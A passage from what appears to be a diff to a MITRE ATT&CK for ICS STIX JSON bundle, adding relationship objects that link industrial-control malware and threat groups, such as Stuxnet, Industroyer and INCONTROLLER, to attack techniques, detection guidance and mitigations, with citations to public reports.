This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dfe43fa1-ffc2-4c6c-a91d-f2ca55f21ccb", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:23:18.048Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 10 'Allanite' Group Targets ICS Networks at Electric Utilities in US, UK Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:42.440Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) leverages watering hole attacks to gain access into electric utilities. 
(Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ad77a940-150c-4d73-bf5a-1df2d9436f9c", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:36:33.957Z", + "description": "Monitor network traffic for anomalies associated with known AiTM behavior. For Collection activity where transmitted data is not manipulated, anomalies may be present in network management protocols (e.g., ARP, DHCP).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b2d4989c-e2d1-40c4-b1d8-07834a71f26f", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 
2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T20:08:31.892Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) developed and used malicious firmware to render communication devices inoperable. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51eca7b9-6330-48a8-badd-65ed3e9d3639", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Restrict unauthorized devices from accessing serial comm ports.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6157408d-1eb3-4445-8d8a-14619458954f", + "created": "2022-09-27T15:26:40.297Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 
"2022-09-27T15:26:40.297Z", + "description": "Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) may be helpful in identifying transient assets.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9902691c-aaf2-48a1-b1ca-cd6f652ae1c6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:53:25.280Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is able to block serial COM channels temporarily causing a denial of control. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--11ab5b1a-b7b3-43bb-bc19-d65bf4ed89f3", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:03.003Z", + "description": "Program uploads may be observable in ICS management protocols or file transfer protocols. Note when protocol functions related to program uploads occur. In cases where the ICS protocols is not well understood, one option is to examine network traffic for the program files themselves using signature-based tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--71c9db9c-6f0c-4e33-a20a-dcd5b791a49a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious 
events.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7912946d-1605-465a-a55c-36bb104235ab", + "created": "2022-09-27T16:08:53.157Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:08:53.157Z", + "description": "Monitor device alarms that indicate the program has changed, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a78e727c-8e42-448c-beb4-463804e18be0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Minimize permissions and access for service accounts to limit impact of exploitation. 
(Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--880161a4-d6c9-4e5b-a78d-39319cfa43ab", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:10:18.233Z", + "description": "Some asset application logs may provide information on I/O points related to write commands. Monitor for write commands for an excessive number of I/O points or manipulating a single value an excessive number of times.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--433539bf-cb17-4de1-9c0f-e579b041514f", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 
2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:16:26.262Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) attempts to connect with a hardcoded internal proxy on TCP 3128 [default Squid proxy]. If established, the backdoor attempts to reach an external C2 server via the internal proxy. (Citation: Dragos Inc. June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54a977df-ca85-43b2-b2bc-96fdcd23aa9b", + "created": "2023-03-30T19:24:38.022Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T16:17:58.795Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) has the capability to terminate specified processes (i.e., PServiceControl.exe and PService_PDD.exe) and rename each process to prevent restart. 
These are defined through a hardcoded configuration.(Citation: Industroyer2 Mandiant April 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--41adaf0b-b7ae-4bdb-9a5b-567fd0911d7a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.145Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8da928a0-1c87-471f-aad7-5a1fdd438357", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:44:43.674Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. 
Software exploits may not always succeed or may cause the exploited process to become unstable or crash, which may be recorded in the application log.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e0810a5-ad02-487f-b0a8-bf07decca493", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:07:52.455Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a847aa03-ea56-47d1-8f4e-f9e0dd9707a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.125Z", + "relationship_type": "mitigates", + "description": "Consider removal of remote services which are not regularly in use, or only enabling them when required (e.g., vendor remote access). 
Ensure all external remote access point (e.g., jump boxes, VPN concentrator) are configured with least functionality, especially the removal of unnecessary services. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348", + "created": "2022-09-28T21:18:55.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. 
Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:21.181Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can send custom Modbus commands to write register values on Schneider PLCs.(Citation: CISA-AA22-103A) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can send write tag values on OPC UA servers.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--80a69b56-337d-446a-8167-8b9f63083c4f", + "created": "2022-09-28T21:24:21.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.442Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) includes a library that creates Modbus connections with a device to request its device ID.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a7caa7f2-cfb9-4fc9-ae8d-49349b6c260f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.175Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e09f3308-57d7-4b2b-b340-784b88ae61ca", + "created": "2022-09-27T15:42:39.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:43:48.288Z", + "description": "Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58a0fd57-ea5f-46b0-84ac-c5b963fb7e94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication wherever possible.\n", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--242b5a0d-e4e8-4ceb-a975-cf8efd64e981", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.138Z", + "relationship_type": "mitigates", + "description": "Protection devices should have minimal digital components to prevent exposure to related adversarial techniques. 
Examples include interlocks, rupture disks, release valves, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) \n", + "source_ref": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "external_references": [ + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--058396ca-3af4-444b-b261-74485c47e68c", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:17.124Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. 
(Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--949b498c-ca3f-4704-90bd-a22a4d34067f", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:37:55.042Z", + "description": "Monitor for loss of operational process data which could indicate alarms are being suppressed. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--31897c41-1d47-4a34-b531-21c3f74651a8", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 
